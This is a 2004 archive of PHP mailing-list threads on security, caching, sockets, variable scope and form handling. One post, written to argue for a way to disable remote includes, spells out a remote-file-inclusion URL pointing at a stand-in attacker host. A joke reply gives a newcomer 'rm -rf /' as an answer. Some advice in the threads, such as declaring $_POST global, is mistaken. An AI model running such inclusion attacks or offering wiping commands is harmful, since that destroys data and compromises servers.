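A DOM pass like this covers attributes, but a maintained HTML sanitizer library is still the better choice for anything beyond a handful of tags.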


Re: [PHP] Re: PHP Security

2004-12-09 Thread Richard Lynch
Chris Shiflett wrote:
> --- Greg Donald <[EMAIL PROTECTED]> wrote:
>> http://seclists.org/lists/security-basics/2004/Dec/0080.html
>
> Most of this is actually true.
>
> The one statement that is unclear is the following:
>
> "There are two kinds of flaws :
> - flaws inherent to the php langage itself, as seen before, in file
> uploads.
> - danger in uploading files at all on the server, not dependent
> on the langage used to handle the actual upload, but regarding
> the potential execution of uploaded files."
>
> This may have meant meant hypothetically, meaning that there are two areas
> where flaws could potentially exist - in the language or in the code. If
> this was meant to suggest that there are existing flaws in the language,
> then this is never justified.

I didn't find the statement to be unclear:  that kind of flaw can exist,
and it has been seen.

There was, unless I've been severely misinformed, a file upload security
bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
release?  I'm sure anybody on this list can dig out that answer as fast as
I, so I won't.  You'll learn more finding out for yourself anyway.

Now, granted, that flaw was fixed IMMEDIATELY.

And, granted, a SysAdmin who chooses to put Beta software on a server is
responsible for the inherent risks involved.

The point, however, that such potential flaws can exist, and could remain
undetected even now in stable, released code (even PHP) is valid.

I personally don't *believe* such flaws could have survived the scrutiny
after the known problems were suffered by the PHP Development Team.

But I don't think any professional will claim that it's impossible for
them to exist.

PS
For the inexperienced reader:  This is, as far as I know, the ONLY known
security flaw in actual PHP C source code to get anywhere near release
form.

But PHP is a powerful tool, and there are innumerable ways it can be used,
mis-used, and just plain abused by yourself to make your own server
insecure.

Do the best you can to figure out how and when, and you'll do all right.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

> --- Richard Lynch <[EMAIL PROTECTED]> wrote:
> 
> > Then your new script is broken, as clearly the GET
> > parameters *ARE* there.
> 
> Sorry, I'm not following you.  Where are my GET
> parameters ?  The way I've built my present script
> is
> the results page is grabbing the parameters.  Do I
> need
> to set up GET parameters in the first/search page ?
> 
> > 
> > Is the new script on a different server or in a
> > different directory? 
> > Perhaps with register_globals turned OFF?
> > 
> No , same server, The new scripts are in a different
> directory than the previous one. They are not
> related
> or call to each other.Register_globals are set to
> ON.
> 
I don't mean to drag this out as I have my work cut
out for me. I did want to add a few more factors that
perhaps are preventing this script from doing the
things I want.

The first search / results form (the one that works):
a: is really proprietary code which is why I want to
dump it
b: It was created as one page and then I broke the
"grid"(results) portion off, so:
c: In the new scripts the search and results were
created separately and most of the code is in the
results page.
What I'm saying is in the search form, all that exists
is the form elements themselves and some resultsets
that feed the multi select lists and menu drop downs.

The results page, has the resultset for formulating
the return records, but it also has the query string
code that grabs the parameters explodes and implodes
them.  
I'm wondering if perhaps I need some of this code in
the search page. 

I wouldn't be throwing this out again, as the scripts
"work", but it's that I need to get the query string
back into the search form and have it display the
parameters there.  I don't even know if that is a
standard function of search pages.  I've done some
googling but have not come up with something that
addresses this type of functionality.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Implementing database cache.

2004-12-09 Thread Richard Lynch
Bruno B B Magalhães wrote:
> does anybody have an idea of which are the required functions to
> implement a database query cache? I have a very nice and fast database
> layer, which I use in all my projects (about 19 sites and a lot of
> others hot-sites and systems like intranet and extranets). Here is my
> idea of the functions:
>
> is_cached();
> read_cache();
> clear_cache();
> write_cache();
>
> And what is the fastest way, shared memory perhaps? And I would have to
> use serialize function to store query results right? and about the
> cache name (or cache_id whatever) I was thinking about using a md5 hash
> of the query itself.
>
> I would love any ideas! :)

1. Rolling your own database cache is probably not a fruitful exercise,
except as a learning experience.  Honest.  The database vendors already
have a cache you can use, and you're not going to beat their performance
with your own in any kind of reasonable development time-frame.

2. You can't serialize the objects, connection, or result, from MySQL
functions.  I'm 100% certain of the connection object, and 99.9% certain
of the result set object.  Those objects go invalid when a script ends, no
matter how you try to save them.  You'll have to suck out all the data and
store that.

3. Shared memory, last time I checked, was a real [bleep] to use because
of a race condition in getting a unique name/semaphore for the storage
space on a server-wide basis.  Maybe this has changed since I last looked,
but back in the day, you were taking the risk that your PHP shared memory
would get trashed by, say, Perl using shared memory.  Or any other
application that wanted to use shared memory.  I *hope* this has been
fixed, for your sake, but be sure you read up on it.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] How to make a PHP Socket client crash-proof?

2004-12-09 Thread Richard Lynch
Have you completely eliminated the possibility of having a second,
independent, completely unrelated client/socket which is used to *SEND*
data to the server?

client_get <-- server
client_send ---> server

They can both use your local database to share data, to whatever degree
you deem necessary, but having one-way sockets for two different scripts
is way easier than trying to get a two-way socket to work, in my
(limited) experience.

If you MUST push forward with a two-way socket, try to determine the state
of the world inside your infinite loop.  Why aren't you breaking out of
that loop?  Can you do *anything* to break out?

I suspect that once you have started SENDING data to the server, it's
going to just keep waiting for you to send more.  How do you signal the
end of your data to be sent?  Does the server understand that signal?

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Pass mysql array into SESSION?

2004-12-09 Thread Richard Lynch
Jerry Swanson wrote:
> I want to pass an array from one page to the Excel generation page. I
> tried to pass through session($_SESSION['sql'] = $var). But value is
> not set.
>
> The array is actually $result = mysql_query($query);

The result from mysql_query() is not an array.

It's a MySQL result reference.

It is tied, by its nature, to the MySQL link (connection) object from
mysql_connect.

Neither the result objects, nor the link object, can survive the end of a
PHP script, for technical reasons.  Actually, maybe some day somebody can
make this work, but it would be real [bleep].  Plus, you'd really only
want to use this in extreme circumstances, despite the seemingly obvious
bonus of expensive database connections surviving for true re-use.

Anyway, back to the more mundane level of your problem:

Use mysql_fetch_array (or mysql_fetch_row, or whatever) to actually get
the content you need, and you can save that in your session.

Depending on how much data you are saving, and how large the strings are
(War and Peace?) you might actually be better off just re-doing the query
in the next script.  You'll have to test on *YOUR* data on *YOUR* server
to be sure either way.  Too many variables render anybody else's data
(mostly) meaningless.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] fread()

2004-12-09 Thread Richard Lynch
Russell P Jones wrote:
> Is there any way to use fread() or a similar function to read a section of
> a document NOT starting at the beginning...
>
> for example, I can read the first 1000 bytes of a document with
>
> fread($doc, 1000);
>
> Is there any way to read the second 1000 bytes?
>
> perhaps, fread($doc, 1000, 2000); who knows
>
> or would substr work?

substr would "work" but performance would most likely suck.

Perhaps you are seeking http://php.net/fseek

:-p

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Richard Lynch
My best guess from skimming your code is that you need:

global $_POST;

in the function that uses $_POST.

Or is $_POST always global anyway?

I always forget, because they changed it around on POST/GLOBALS/etc at
some point, but only on some of them.  Grrr.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> My best guess from skimming your code is that you need:
> 
> global $_POST;
> 

should I put this at the top of my code with the rest of my variables?

> in the function that uses $_POST.
> 
> Or is $_POST always global anyway?
No. 

> 
> I always forget, because they changed it around on POST/GLOBALS/etc at
> some point, but only on some of them.  Grrr.
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 15:39 -0500, Roger Spears wrote:
> Danny Brow wrote:
> > On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
> > 
> >>Danny Brow wrote:
> >>
> >>>Below is a snip of a program I am writing, I am a little new to php.
> >>>Anyhow, I can't for the life of me figure out why one of my functions
> >>>cannot grab the item_pics1 variable. I have tried passing the variable
> >>>to the function, tried using $GLOBALS['item_pic1']. So I guess my
> >>>question is, does PHP in some cases need to have a variable in an if
> >>>statement sent back to the global scope? everything works but the
> >>>str_replace item_pics1. Hope this is enough code.
> 
> 
> This may seem a little simple, but it's happened to me.  Are you sure 
> the variable has a value?

Yes, I can do a print $item_pics before and after the function.

dan.

PS. Roger, sorry for sending this to you twice, you sent your reply to me directly 
and not to the list.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> My best guess from skimming your code is that you need:
> 
> global $_POST;
> 
> in the function that uses $_POST.
> 
> Or is $_POST always global anyway?
> 
> I always forget, because they changed it around on POST/GLOBALS/etc at
> some point, but only on some of them.  Grrr.
> 

After reading this again, the function does not use $_POST at all.

here it is again.

function html_template() {
    global $item_pics1;
    if (file_exists('item.html')) {
        print "This is item_pics1" . $item_pics1;
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{item_pictures}', $item_pics1,
            $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
            $html_template);
        $html_template = str_replace('{description}',
            $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
            $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
            "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
        fclose($item_fh);
    } else {
        $GLOBALS['errors'] .= "item.html template does not exist";
    }
}

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-09 Thread John Nichel
Richard Lynch wrote:
> Chris Shiflett wrote:
>> --- Greg Donald <[EMAIL PROTECTED]> wrote:
>>> http://seclists.org/lists/security-basics/2004/Dec/0080.html
>>
>> Most of this is actually true.
>>
>> The one statement that is unclear is the following:
>>
>>    "There are two kinds of flaws :
>>    - flaws inherent to the php language itself, as seen before, in file
>>    uploads.
>>    - danger in uploading files at all on the server, not dependent
>>    on the language used to handle the actual upload, but regarding
>>    the potential execution of uploaded files."
>>
>> This may have been meant hypothetically, meaning that there are two areas
>> where flaws could potentially exist - in the language or in the code. If
>> this was meant to suggest that there are existing flaws in the language,
>> then this is never justified.
>
> I didn't find the statement to be unclear:  that kind of flaw can exist,
> and it has been seen.
>
> There was, unless I've been severely misinformed, a file upload security
> bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
> release?  I'm sure anybody on this list can dig out that answer as fast as
> I, so I won't.  You'll learn more finding out for yourself anyway.

I'm pretty sure Chris is one who doesn't have to dig to find out about 
an old security flaw.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 04:48, Danny Brow wrote:
> On Thu, 2004-12-09 at 12:40 -0800, Richard Lynch wrote:
> > My best guess from skimming your code is that you need:
> >
> > global $_POST;
>
> should I put this at the top of my code with the rest of my variables?

No

> > in the function that uses $_POST.
> >
> > Or is $_POST always global anyway?
>
> No.

Yes

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #227:

Fatal error right in front of screen
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Danny Brow wrote:

function html_template() {
    global $item_pics1;
    if (file_exists('item.html')) {
        print "This is item_pics1" . $item_pics1;
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{item_pictures}', $item_pics1,
            $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
            $html_template);
        $html_template = str_replace('{description}',
            $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
            $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
            "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
        fclose($item_fh);
    } else {
        $GLOBALS['errors'] .= "item.html template does not exist";
    }
}

So what is the function doing or not doing?  If 'index.html' isn't in 
the same directory as the script, it will evaluate to false and the only 
code the function will execute is...

$GLOBALS['errors'] .= "item.html template does not exist";
Maybe do a print_r ( $GLOBALS ) inside the function to make sure the 
values you're looking for are actually there.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 04:52, Danny Brow wrote:

OK, you never said what your problem was except to say "everything works but 
the str_replace item_pics1."

Did you check $GLOBALS['errors'] after calling this function?

> function html_template() {
> global $item_pics1;
> if (file_exists('item.html')) {

Is this file supposed to be same as the one below?

> $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
> "/item.html";

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
We are all dying -- and we're gonna be dead for a long time.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
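The scope rule this thread goes back and forth on (superglobals such as $_POST are visible inside a function without `global`; an ordinary global like $item_pics1 is not), followed by the same template fill written so that it does not depend on global state at all. This is an added example, not Danny's code; the template text, the temp-file path and the helper names are constructed here.

```php
<?php
// Added example, not Danny's code. It shows the scope rule the thread argues
// about and then fills the template without depending on global state.

/** Which of three variables is visible inside a function without "global"? */
function scopeDemo(): array
{
    return [
        'plain global'   => isset($item_pics1) ? 'visible' : 'not visible',
        '$GLOBALS entry' => isset($GLOBALS['item_pics1']) ? 'visible' : 'not visible',
        'superglobal'    => isset($_POST) ? 'visible' : 'not visible',
    ];
}

/**
 * Replace {placeholders} in a template. Text fields are HTML-escaped so a
 * title or description containing "<" cannot break the generated page; keys
 * listed in $rawKeys (here the pictures markup) are inserted as-is.
 */
function fillTemplate(string $template, array $values, array $rawKeys = []): string
{
    $pairs = [];
    foreach ($values as $key => $value) {
        $pairs['{' . $key . '}'] = in_array($key, $rawKeys, true)
            ? (string) $value
            : htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
    }
    return strtr($template, $pairs);
}

/** Write the page with 'x' (create only) and report instead of failing silently. */
function writeItemPage(string $path, string $html, array &$errors): bool
{
    $fh = @fopen($path, 'x');
    if ($fh === false) {
        $errors[] = "$path already exists or its directory is not writable";
        return false;
    }
    fwrite($fh, $html);
    fclose($fh);            // the original never closed the handle
    return true;
}

// constructed demo data
$item_pics1 = '<img src="pic1.jpg" alt="item">';
print_r(scopeDemo());

$template = "<h1>{title}</h1>\n{item_pictures}\n<p>{description}</p>\n<p>{price}</p>\n";
$html = fillTemplate($template, [
    'title'         => 'Widget <deluxe>',     // the "<" is escaped in the page
    'item_pictures' => $item_pics1,
    'description'   => 'A widget',
    'price'         => '9.99',
], ['item_pictures']);

$errors = [];
$path = sys_get_temp_dir() . '/item-' . getmypid() . '.html';
if (writeItemPage($path, $html, $errors)) {
    echo "written to $path\n";
    unlink($path);
} else {
    echo implode("\n", $errors), "\n";
}
```

Passing the values in as parameters also removes the guesswork John and Jason were doing: a function that receives everything it uses can be tested on its own, and there is no `global` line to forget.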



Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread KJ
OK, apologies on my part, I did not correctly explain the problem which 
can and has arisen from remote includes.

I'll try to explain the problem that I have come across twice in the 
last couple of years both with popular software packages that I 
downloaded like thousands of others and both with exactly the same 
vulnerability and both resulted in my site being compromised and having 
to resort to backups.

The vulnerability occurred where both applications had a variable setting 
a base directory of the source code, which was used when including files 
throughout the application, i.e.:

$base_url = '/home/example.com/www';
include_once ($base_url.'/config.php');
In config.php you would then have, for example:

Now in each instance register globals was on and all that was needed to 
compromise the site was to have a variable passed in the url to set the 
base url to a remote site, which in turn output php to execute, i.e.:

http://example.com/config.php?base_url=http://myhacksite.example.com
Now, you are correct that education on how to avoid this kind of issue 
is key, however that does not avoid the problem. Turning off register 
globals would prevent many of these attacks, however there are still 
many apps out there that require register globals to be on and there are 
other ways to use this exploit with them off.

Now all I'm saying is that given the potential for damage and, from my 
point of view, the little improvement that this feature actually 
provides, why would you NOT have a way of disabling it. I would if I 
could, and I know of others who would as well.

Any thoughts?
KJ
PS: If you gave someone that you didn't trust access to your scripts 
then you're asking for trouble, that was not my point and was not part 
of any kind of thinking towards this request.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
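The include pattern KJ describes, with the fix a defender would apply in the application itself, as an added example that is not KJ's code. The "before" is a reconstruction of the pattern (config.php requested directly, expecting $base_url from its caller); the file names `functions.php`, the `resolveInclude` helper and the temporary directory are constructed for the demo. The fix has two parts: the base directory comes from a constant derived from `__DIR__`, which request data cannot overwrite whatever register_globals is set to, and request data only ever selects a key from a fixed map, never a path.

```php
<?php
// Added example, not KJ's code. The commented-out "before" is the pattern KJ
// describes: config.php uses $base_url without setting it, and with
// register_globals on the query string sets it; with allow_url_fopen on the
// include then fetches and runs remote code. The "after" anchors the root to a
// constant and resolves names through an allow-list, so request data never
// reaches include.

// --- before (config.php, requested directly with ?base_url=...) ---
// include_once ($base_url . '/functions.php');   // hypothetical file; $base_url is
//                                                 // whatever the request supplied

// --- after ---
// In every file, derive the root from the file's own location, not a variable:
//     define('APP_ROOT', __DIR__);
// and resolve includes through this helper.
function resolveInclude(string $root, string $name): string
{
    // fixed map from logical name to file: request data can only pick a key
    $allowed = ['config' => 'config.php', 'functions' => 'functions.php']; // hypothetical files
    if (!isset($allowed[$name])) {
        throw new InvalidArgumentException("unknown include name: $name");
    }
    $realRoot = realpath($root);
    $path     = realpath($root . '/' . $allowed[$name]);
    // realpath() returns false for missing files and for URLs, and it collapses
    // "..", so anything that does not sit under $root is rejected here
    if ($realRoot === false || $path === false
        || strncmp($path, $realRoot . DIRECTORY_SEPARATOR, strlen($realRoot) + 1) !== 0) {
        throw new RuntimeException("refusing to include '$name' from outside $root");
    }
    return $path;
}

// constructed demo: a throwaway root holding one real config.php
$root = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/config.php", "<?php return ['db_host' => 'localhost'];\n");

foreach (['config', 'http://myhacksite.example.com', 'functions'] as $name) {
    try {
        $settings = include resolveInclude($root, $name);
        echo "$name: included, db_host=" . $settings['db_host'] . "\n";
    } catch (Exception $e) {
        echo "$name: rejected (" . $e->getMessage() . ")\n";
    }
}
unlink("$root/config.php");
rmdir($root);
```

The second and third names are rejected by different checks: the remote URL is not a key in the map, and `functions` is a key but its file does not exist under the root, so realpath() returns false. As for KJ's request, PHP did later add the switch he asks for: `allow_url_include` (separate from `allow_url_fopen`, PHP 5.2) controls whether include and require accept URLs at all, and register_globals itself was removed in PHP 5.4.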


[PHP] How to post quote/double quote mark?

2004-12-09 Thread Yao, Minghua
Hi, 

I used the following function to post a string variable "abcdef" to a PHP 
program on another host: 


"/path/to/test.php" on "host/name" is as follows.


It seemed that test.php got \"abcdef\", instead of "abcdef". Could anyone 
please tell me how to pass "abcdef" to test.php?
Thanks in advance.

-Minghua





[PHP] Forms and viewing Text Area

2004-12-09 Thread Ben C
I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Forms and viewing Text Area

2004-12-09 Thread Marek Kilimajer
Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?
put  tag around it. and don't forget htmlspecialchars():
echo '' . htmlspecialchars($input) . '';
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Forms and viewing Text Area

2004-12-09 Thread John Holmes
Ben C wrote:
I have a form which has a text box which then stores in MySQL.  When I
write seperate paragraphs and try and then view what I wrote it lumps
it all together in one paragraph when I echo.  I am sure I am doing
something simply wrong.  Anyone have any ideas?
The line breaks are preserved. If you look at the HTML source of your 
page, you'll see that. HTML does not render line breaks, though, you 
need  tags. So using nl2br() or something similar would work.

--
---John Holmes...
Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/
php|architect: The Magazine for PHP Professionals – www.phparch.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
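The two answers above together, as an added example that is not code from the thread: nl2br() for the line breaks (John) and htmlspecialchars() so that markup in the stored text is shown rather than rendered (Marek). The sample text is constructed, standing in for what arrives in $_POST from the textarea.

```php
<?php
// Added example, not from the thread: show what a user typed into a textarea
// with its paragraphs intact, without letting any markup in it run.
function renderUserText(string $text): string
{
    // browsers send CRLF from textareas; collapse to LF so nl2br() sees one form
    $text = str_replace(["\r\n", "\r"], "\n", $text);
    // escape first, then add <br />. Doing it the other way round would escape
    // the <br /> tags nl2br() just inserted, and the text would again be one lump
    return nl2br(htmlspecialchars($text, ENT_QUOTES, 'UTF-8'));
}

// constructed sample, as it would arrive in $_POST['comment'] from a textarea
$posted = "First paragraph.\r\n\r\nSecond paragraph with <b>tags</b> & an ampersand.";
echo renderUserText($posted), "\n";
```

The order is the whole point: escape, then insert the `<br />` tags. Escaping at output time like this also means the text can be stored in MySQL exactly as typed, with no HTML-specific mangling on the way in.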


[PHP] baffled - please explain

2004-12-09 Thread Malcolm Mill
Hi, 
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:

function my_function ( )
{
  echo 'My function was called';
}

function my_function ( )
{   
?>
My function was called
<?php
}
?>

What are those single opening and closing curly braces doing in
separate  tag blocks? What's the point?
The author says "Within a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewhere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.

If the point is to illustrate what this quote says, does that mean...

{   
?>
My function was called
<?php
}

...is a syntactically correct code block for my_function?

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] baffled - please explain

2004-12-09 Thread adwin wijaya
Malcolm Mill wrote:
Hi, 
I just came across a sniplet of code in a book I'm reading and I'm not
sure what point the author is trying to make.

The code is:
function my_function ( )
{
  echo 'My function was called';
}

function my_function ( )
{   
?>
My function was called
<?php
}
?>

What are those single opening and closing curly braces doing in
separate  tag blocks? What's the point?
The author says "Within a function, curly braces enclose the code
that performs the task you require. Between these braces, you can have
anything that is legal elsewhere in a PHP script" - PHP and MySQL Web
Development, 3rd Edition: Welling & Thomson.
If the point is to illustrate what this quote says, does that mean...
{   
?>
My function was called
<?php
}

...is a syntactically correct code block for my_function?
It is correct but it is not suggested.
The author wants to show you that instead of using echo 'My function was 
called', you can do it that way.

but
 {
 ?>
 My function was called
 <?php
is not correct :)
best regards
adwin
www.kuya-kuya.net
www.e-rhema.net
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] ISP snippet

2004-12-09 Thread Brad Ciszewski
i need help to figure out the isp of a user. can anyone help me with this?



-Brad

www.BradTechnologies.com
99.9% Uptime
24/7 Support
Packages as low as 3.50 p/month!
www.BradTechnologies.com

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-09 Thread I l
the best security practice is to store the jpg file or any other uploaded 
file in your mySql database. This way you never have to worry about someone 
executing php by the url like www.example.com/pic.jpg. To view the file, the 
user would type www.example.com/veiw.php?fileID=3425433345.

You can also keep information about the file uploaded in your mysql such as 
IP address.

I can't really see any security problems here.

From: John Nichel <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security
Date: Thu, 09 Dec 2004 15:53:50 -0500

> Richard Lynch wrote:
>> Chris Shiflett wrote:
>>> --- Greg Donald <[EMAIL PROTECTED]> wrote:
>>>> http://seclists.org/lists/security-basics/2004/Dec/0080.html
>>>
>>> Most of this is actually true.
>>>
>>> The one statement that is unclear is the following:
>>>
>>>    "There are two kinds of flaws :
>>>    - flaws inherent to the php language itself, as seen before, in file
>>>    uploads.
>>>    - danger in uploading files at all on the server, not dependent
>>>    on the language used to handle the actual upload, but regarding
>>>    the potential execution of uploaded files."
>>>
>>> This may have been meant hypothetically, meaning that there are two
>>> areas where flaws could potentially exist - in the language or in the
>>> code. If this was meant to suggest that there are existing flaws in the
>>> language, then this is never justified.
>>
>> I didn't find the statement to be unclear:  that kind of flaw can exist,
>> and it has been seen.
>>
>> There was, unless I've been severely misinformed, a file upload security
>> bug in a PHP 4 Beta (possibly even Release Candidate).  Did it make it to
>> release?  I'm sure anybody on this list can dig out that answer as fast as
>> I, so I won't.  You'll learn more finding out for yourself anyway.
>
> I'm pretty sure Chris is one who doesn't have to dig to find out about an 
> old security flaw.
>
> --
> John C. Nichel
> ÜberGeek
> KegWorks.com
> 716.856.9675
> [EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] How do you work this thing

2004-12-09 Thread Wil Hitchman
How does this work?

RE: [PHP] How do you work this thing

2004-12-09 Thread Chris W. Parker
Wil Hitchman 
on Thursday, December 09, 2004 4:40 PM said:

> How does this work?

It needs two D size batteries.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] How do you work this thing

2004-12-09 Thread Rory Browne
On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker <[EMAIL PROTECTED]> wrote:
> Wil Hitchman 
> on Thursday, December 09, 2004 4:40 PM said:
> 
> > How does this work?
> 
> It needs two D size batteries.
> 
Or three C size batteries, depending on what the heck he is on about.



> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] ISP snippet

2004-12-09 Thread John Nichel
Brad Ciszewski wrote:
i need help to figure out the isp of a user. can anyone help me with this?
Maybe you can ask the user real nice.
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] How do you work this thing

2004-12-09 Thread John Nichel
Wil Hitchman wrote:
How does this work?
rm -rf /
--
By-Tor.com
...it's all about the Rush
http://www.by-tor.com
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] How do you work this thing

2004-12-09 Thread Robert Cummings
On Thu, 2004-12-09 at 19:59, Rory Browne wrote:
> On Thu, 9 Dec 2004 16:42:20 -0800, Chris W. Parker <[EMAIL PROTECTED]> wrote:
> > Wil Hitchman 
> > on Thursday, December 09, 2004 4:40 PM said:
> > 
> > > How does this work?
> > 
> > It needs two D size batteries.
> > 
> Or three C size batteries, depending on what the heck he is on about.

No, no, no, we want to keep the earth clean... a dynamo and pedals ought
to give him an unlimited renewable energy source.

Cheers,
Rob.
-- 
..
| InterJinn Application Framework - http://www.interjinn.com |
::
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for   |
| creating re-usable components quickly and easily.  |
`'

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Spurious newlines when requesting empty php file

2004-12-09 Thread Carl Michael Skog
Some strange results with spurious newlines inserted in the response when 
requesting a php file has led me to investigating what happens when a 
completely empty php-file is requested.



I would have thought that the response from a empty php file would also be 
empty, but, to my surprise, they consist of 3 newlines !!!



The strange thing is that I observed this behaviour on two completely unrelated 
servers.



Is this what can be expected or is it a result of misconfiguration ?



Kind regards, 

Carl Michael Skog

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] ISP snippet

2004-12-09 Thread Vail, Warren
I can't help but wonder if an ip trace rte could be used to help identify
the ISP?  Or perhaps using a whois,,, don't some versions of whois use IP
address?  Intriguing question,,,

Warren Vail

> -Original Message-
> From: John Nichel [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, December 09, 2004 5:04 PM
> To: [EMAIL PROTECTED]
> Subject: Re: [PHP] ISP snippet
> 
> 
> Brad Ciszewski wrote:
> > i need help to figure out the isp of a user. can anyone 
> help me with 
> > this?
> 
> Maybe you can ask the user real nice.
> 
> -- 
> By-Tor.com
> ..it's all about the Rush
> http://www.by-tor.com
> 
> -- 
